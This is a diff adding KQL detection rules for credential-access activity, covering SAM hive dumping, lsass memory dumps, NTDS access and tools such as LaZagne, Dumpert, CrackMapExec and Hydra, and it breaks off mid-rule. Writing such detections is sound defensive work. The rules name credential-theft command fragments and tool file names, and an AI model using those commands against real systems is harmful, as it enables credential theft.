Access/copying_sensitive_files_with_credential_data.kql @@ -0,0 +1,12 @@ +// Title: Copying Sensitive Files with Credential Data +// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-22 +// Level: high +// Description: Files with well-known filenames (sensitive files with credential data) copying +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003, car.2013-07-001, attack.s0404 +// False Positives: +// - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator. + +DeviceProcessEvents +| where ((ProcessCommandLine contains "vss" or ProcessCommandLine contains " -m " or ProcessCommandLine contains " /m " or ProcessCommandLine contains " –m " or ProcessCommandLine contains " —m " or ProcessCommandLine contains " ―m " or ProcessCommandLine contains " -y " or ProcessCommandLine contains " /y " or ProcessCommandLine contains " –y " or ProcessCommandLine contains " —y " or ProcessCommandLine contains " ―y ") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "\\esentutl.exe")) or (ProcessCommandLine contains "\\config\\RegBack\\sam" or ProcessCommandLine contains "\\config\\RegBack\\security" or ProcessCommandLine contains "\\config\\RegBack\\system" or ProcessCommandLine contains "\\config\\sam" or ProcessCommandLine contains "\\config\\security" or ProcessCommandLine contains "\\config\\system " or ProcessCommandLine contains "\\repair\\sam" or ProcessCommandLine contains "\\repair\\security" or ProcessCommandLine contains "\\repair\\system" or ProcessCommandLine contains "\\windows\\ntds\\ntds.dit") \ No newline at end of file diff --git a/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql b/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql new file mode 100644 index 00000000..15a616e2 --- /dev/null +++ b/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql @@ -0,0 +1,12 @@ +// Title: Cred Dump Tools Dropped Files +// Author: Teymur Kheirkhabarov, oscd.community +// Date: 2019-11-01 +// Level: high +// Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.003, attack.t1003.004, attack.t1003.005 +// False Positives: +// - Legitimate Administrator using tool for password recovery + +DeviceFileEvents +| where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll") \ No newline at end of file diff --git a/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql b/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql new file mode 100644 index 00000000..f1da9f32 --- /dev/null +++ b/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql @@ -0,0 +1,14 @@ +// Title: Credential Manager Access By Uncommon Applications +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-11 +// Level: medium +// Description: Detects suspicious processes based on name and location that access the windows credential manager and vault. +Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function + +// MITRE Tactic: Credential Access +// Tags: attack.t1003, attack.credential-access +// False Positives: +// - Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason). + +DeviceFileEvents +| where (FileName contains "\\AppData\\Local\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Roaming\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Local\\Microsoft\\Vault\\" or FileName contains "\\ProgramData\\Microsoft\\Vault\\") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql b/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql new file mode 100644 index 00000000..cce1fca6 --- /dev/null +++ b/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql @@ -0,0 +1,12 @@ +// Title: Credentials from Password Stores - Keychain +// Author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems) +// Date: 2020-10-19 +// Level: medium +// Description: Detects passwords dumps from Keychain +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "find-certificate" or ProcessCommandLine contains " export ") and FolderPath =~ "/usr/bin/security") or (ProcessCommandLine contains " dump-keychain " or ProcessCommandLine contains " login-keychain ") \ No newline at end of file diff --git a/KQL/rules/Credential Access/credentials_in_files.kql b/KQL/rules/Credential Access/credentials_in_files.kql new file mode 100644 index 00000000..1ac52bd4 --- /dev/null +++ b/KQL/rules/Credential Access/credentials_in_files.kql @@ -0,0 +1,10 @@ +// Title: Credentials In Files +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-19 +// Level: high +// Description: Detecting attempts to extract passwords with grep and laZagne +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "password" and FolderPath endswith "/grep") or ProcessCommandLine contains "laZagne" \ No newline at end of file diff --git a/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql b/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql new file mode 100644 index 00000000..657873d6 --- /dev/null +++ b/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql @@ -0,0 +1,12 @@ +// Title: CredUI.DLL Loaded By Uncommon Process +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-20 +// Level: medium +// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.collection, attack.t1056.002 +// False Positives: +// - Other legitimate processes loading those DLLs in your environment. + +DeviceImageLoadEvents +| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql b/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql new file mode 100644 index 00000000..b6f4121e --- /dev/null +++ b/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql @@ -0,0 +1,13 @@ +// Title: DPAPI Backup Keys And Certificate Export Activity IOC +// Author: Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-26 +// Level: high +// Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555, attack.t1552.004 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where (FolderPath contains "ntds_capi_" or FolderPath contains "ntds_legacy_" or FolderPath contains "ntds_unknown_") and (FolderPath endswith ".cer" or FolderPath endswith ".key" or FolderPath endswith ".pfx" or FolderPath endswith ".pvk") \ No newline at end of file diff --git a/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql b/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql new file mode 100644 index 00000000..30d6ab69 --- /dev/null +++ b/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql @@ -0,0 +1,12 @@ +// Title: Dumping of Sensitive Hives Via Reg.EXE +// Author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113 +// Date: 2019-10-22 +// Level: high +// Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002, attack.t1003.004, attack.t1003.005, car.2013-07-001 +// False Positives: +// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation + +DeviceProcessEvents +| where (ProcessCommandLine contains " save " or ProcessCommandLine contains " export " or ProcessCommandLine contains " ˢave " or ProcessCommandLine contains " eˣport ") and (ProcessCommandLine contains "\\system" or ProcessCommandLine contains "\\sam" or ProcessCommandLine contains "\\security" or ProcessCommandLine contains "\\ˢystem" or ProcessCommandLine contains "\\syˢtem" or ProcessCommandLine contains "\\ˢyˢtem" or ProcessCommandLine contains "\\ˢam" or ProcessCommandLine contains "\\ˢecurity") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hk˪m" or ProcessCommandLine contains "hkey_local_machine" or ProcessCommandLine contains "hkey_˪ocal_machine" or ProcessCommandLine contains "hkey_loca˪_machine" or ProcessCommandLine contains "hkey_˪oca˪_machine") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql b/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql new file mode 100644 index 00000000..0f646b54 --- /dev/null +++ b/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql @@ -0,0 +1,12 @@ +// Title: Dumping Process via Sqldumper.exe +// Author: Kirill Kiryanov, oscd.community +// Date: 2020-10-08 +// Level: medium +// Description: Detects process dump via legitimate sqldumper.exe binary +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Legitimate MSSQL Server actions + +DeviceProcessEvents +| where (ProcessCommandLine contains "0x0110" or ProcessCommandLine contains "0x01100:40") and FolderPath endswith "\\sqldumper.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql b/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql new file mode 100644 index 00000000..ee03e1f5 --- /dev/null +++ b/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql @@ -0,0 +1,10 @@ +// Title: Enumeration for 3rd Party Creds From CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm\\" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\" or ProcessCommandLine contains "\\Software\\Sota\\FFFTP" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin") and (not(((ProcessCommandLine contains "export" or ProcessCommandLine contains "save") and FolderPath endswith "reg.exe"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql b/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql new file mode 100644 index 00000000..8a7da21a --- /dev/null +++ b/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql @@ -0,0 +1,13 @@ +// Title: Enumeration for Credentials in Registry +// Author: frack113 +// Date: 2021-12-20 +// Level: medium +// Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials. +The Windows Registry stores configuration information that can be used by the system or other programs. +Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.002 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " query " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_SZ" and ProcessCommandLine contains "/s") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKLM") or (ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKCU") or ProcessCommandLine contains "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions") \ No newline at end of file diff --git a/KQL/rules/Credential Access/esentutl_gather_credentials.kql b/KQL/rules/Credential Access/esentutl_gather_credentials.kql new file mode 100644 index 00000000..2acd3ec5 --- /dev/null +++ b/KQL/rules/Credential Access/esentutl_gather_credentials.kql @@ -0,0 +1,12 @@ +// Title: Esentutl Gather Credentials +// Author: sam0x90 +// Date: 2021-08-06 +// Level: medium +// Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003, attack.t1003.003, attack.s0404 +// False Positives: +// - To be determined + +DeviceProcessEvents +| where ProcessCommandLine contains "esentutl" and ProcessCommandLine contains " /p" \ No newline at end of file diff --git a/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql b/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql new file mode 100644 index 00000000..42aee421 --- /dev/null +++ b/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql @@ -0,0 +1,10 @@ +// Title: Esentutl Volume Shadow Copy Service Keys +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-20 +// Level: high +// Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 + +DeviceRegistryEvents +| where (InitiatingProcessFolderPath endswith "esentutl.exe" and RegistryKey contains "System\\CurrentControlSet\\Services\\VSS") and (not(RegistryKey contains "System\\CurrentControlSet\\Services\\VSS\\Start")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql b/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql new file mode 100644 index 00000000..392832e1 --- /dev/null +++ b/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql @@ -0,0 +1,16 @@ +// Title: File Access Of Signal Desktop Sensitive Data +// Author: Andreas Braathen (mnemonic.io) +// Date: 2025-10-19 +// Level: medium +// Description: Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json. +The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data. +Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials. +Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 +// False Positives: +// - Unlikely, but possible from AV or backup software accessing the files. + +DeviceRegistryEvents +| where (RegistryKey endswith "\\AppData\\Roaming\\Signal*" and (RegistryKey endswith "\\config.json" or RegistryKey endswith "\\db.sqlite")) and (not((InitiatingProcessFolderPath endswith "\\signal-portable.exe" or InitiatingProcessFolderPath endswith "\\signal.exe"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/findstr_gpp_passwords.kql b/KQL/rules/Credential Access/findstr_gpp_passwords.kql new file mode 100644 index 00000000..2f0fe3c9 --- /dev/null +++ b/KQL/rules/Credential Access/findstr_gpp_passwords.kql @@ -0,0 +1,10 @@ +// Title: Findstr GPP Passwords +// Author: frack113 +// Date: 2021-12-27 +// Level: high +// Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.006 + +DeviceProcessEvents +| where (ProcessCommandLine contains "cpassword" and ProcessCommandLine contains "\\sysvol\\" and ProcessCommandLine contains ".xml") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql b/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql new file mode 100644 index 00000000..67ec6831 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql @@ -0,0 +1,10 @@ +// Title: HackTool - CrackMapExec File Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-03-11 +// Level: high +// Description: Detects file creation events with filename patterns used by CrackMapExec. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 + +DeviceFileEvents +| where FolderPath startswith "C:\\Windows\\Temp\\" and ((FolderPath matches regex "\\\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\.txt$" or FolderPath matches regex "\\\\[a-zA-Z]{8}\\.tmp$") or (FolderPath endswith "\\temp.ps1" or FolderPath endswith "\\msol.ps1")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql b/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql new file mode 100644 index 00000000..83fdab97 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql @@ -0,0 +1,10 @@ +// Title: HackTool - CrackMapExec Process Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-12 +// Level: high +// Description: Detects suspicious process patterns found in logs when CrackMapExec is used +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k ") and (ProcessCommandLine contains "tasklist /fi " and ProcessCommandLine contains "Imagename eq lsass.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) or (ProcessCommandLine contains "do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump" and ProcessCommandLine contains "\\Windows\\Temp\\" and ProcessCommandLine contains " full" and ProcessCommandLine contains "%%B") or (ProcessCommandLine contains "tasklist /v /fo csv" and ProcessCommandLine contains "findstr /i \"lsass\"") \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql new file mode 100644 index 00000000..0dfcd2dc --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Dumpert Process Dumper Default File +// Author: Florian Roth (Nextron Systems) +// Date: 2020-02-04 +// Level: critical +// Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Very unlikely + +DeviceFileEvents +| where FolderPath endswith "dumpert.dmp" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql new file mode 100644 index 00000000..c57008c1 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Dumpert Process Dumper Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2020-02-04 +// Level: critical +// Description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Very unlikely + +DeviceProcessEvents +| where MD5 startswith "09D278F9DE118EF09163C6140255C690" or ProcessCommandLine contains "Dumpert.dll" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql b/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql new file mode 100644 index 00000000..e4f6d8f5 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql @@ -0,0 +1,12 @@ +// Title: Hacktool Execution - PE Metadata +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-27 +// Level: high +// Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.resource-development, attack.t1588.002, attack.t1003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessVersionInfoCompanyName =~ "Cube0x0" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql b/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql new file mode 100644 index 00000000..b406a4b5 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Hashcat Password Cracker Execution +// Author: frack113 +// Date: 2021-12-27 +// Level: high +// Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1110.002 +// False Positives: +// - Tools that use similar command line flags and values + +DeviceProcessEvents +| where (ProcessCommandLine contains "-a " and ProcessCommandLine contains "-m 1000 " and ProcessCommandLine contains "-r ") or FolderPath endswith "\\hashcat.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql b/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql new file mode 100644 index 00000000..cb8dc0bd --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Hydra Password Bruteforce Execution +// Author: Vasiliy Burov +// Date: 2020-10-05 +// Level: high +// Description: Detects command line parameters used by Hydra password guessing hack tool +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1110, attack.t1110.001 +// False Positives: +// - Software that uses the caret encased keywords PASS and USER in its command line + +DeviceProcessEvents +| where (ProcessCommandLine contains "^USER^" or ProcessCommandLine contains "^PASS^") and (ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql b/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql new file mode 100644 index 00000000..8210e8f2 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Impacket File Indicators +// Author: The DFIR Report, IrishDeath +// Date: 2025-05-19 +// Level: high +// Description: Detects file creation events with filename patterns used by Impacket. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 + +DeviceFileEvents +| where FolderPath matches regex "\\\\sessionresume_[a-zA-Z]{8}$" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_inveigh_execution.kql b/KQL/rules/Credential Access/hacktool_inveigh_execution.kql new file mode 100644 index 00000000..dedcb6d2 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_inveigh_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Inveigh Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-24 +// Level: critical +// Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Very unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\Inveigh.exe" or (ProcessVersionInfoOriginalFileName in~ ("\\Inveigh.exe", "\\Inveigh.dll")) or ProcessVersionInfoFileDescription =~ "Inveigh" or (ProcessCommandLine contains " -SpooferIP" or ProcessCommandLine contains " -ReplyToIPs " or ProcessCommandLine contains " -ReplyToDomains " or ProcessCommandLine contains " -ReplyToMACs " or ProcessCommandLine contains " -SnifferIP") \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql b/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql new file mode 100644 index 00000000..a733abc0 --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - KrbRelay Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-27 +// Level: high +// Description: Detects the use of KrbRelay, a Kerberos relaying tool +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1558.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " -spn " and ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -rbcd ") or (ProcessCommandLine contains "shadowcred" and ProcessCommandLine contains "clsid" and ProcessCommandLine contains "spn") or (ProcessCommandLine contains "spn " and ProcessCommandLine contains "session " and ProcessCommandLine contains "clsid ") or (FolderPath endswith "\\KrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelay.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_lazagne_execution.kql b/KQL/rules/Credential Access/hacktool_lazagne_execution.kql new file mode 100644 index 00000000..39e5888b --- /dev/null +++ b/KQL/rules/Credential Access/hacktool_lazagne_execution.kql @@ -0,0 +1,14 @@ +// Title: HackTool - LaZagne Execution +// Author: Nasreddine Bencherchali, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2024-06-24 +// Level: medium +// Description: Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer. +LaZagne has been leveraged multiple times by threat actors in order to dump credentials. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access +// False Positives: +// - Some false positive is expected from tools with similar command line flags. + +DeviceProcessEvents +| where (((ProcessCommandLine endswith ".exe all" or ProcessCommandLine endswith ".exe browsers" or ProcessCommandLine endswith ".exe chats" or ProcessCommandLine endswith ".exe databases" or ProcessCommandLine endswith ".exe games" or ProcessCommandLine endswith ".exe git" or ProcessCommandLine endswith ".exe mails" or ProcessCommandLine endswith ".exe maven" or ProcessCommandLine endswith ".exe memory" or ProcessCommandLine endswith ".exe multimedia" or ProcessCommandLine endswith ".exe sysadmin" or ProcessCommandLine endswith ".exe unused" or ProcessCommandLine endswith ".exe wifi" or ProcessCommandLine endswith ".exe windows") and (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Tmp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Favorites\\" or FolderPath contains "\\Links\\" or FolderPath contains "\\Music\\" or FolderPath contains "\\Photos\\" or FolderPath contains "\\Pictures\\" or FolderPath contains "\\Saved Games\\" or FolderPath contains "\\Searches\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "\\Videos\\" or FolderPath contains "\\Windows\\addins\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\")) or FolderPath endswith "\\lazagne.exe") or ((ProcessCommandLine contains " all " or ProcessCommandLine contains " 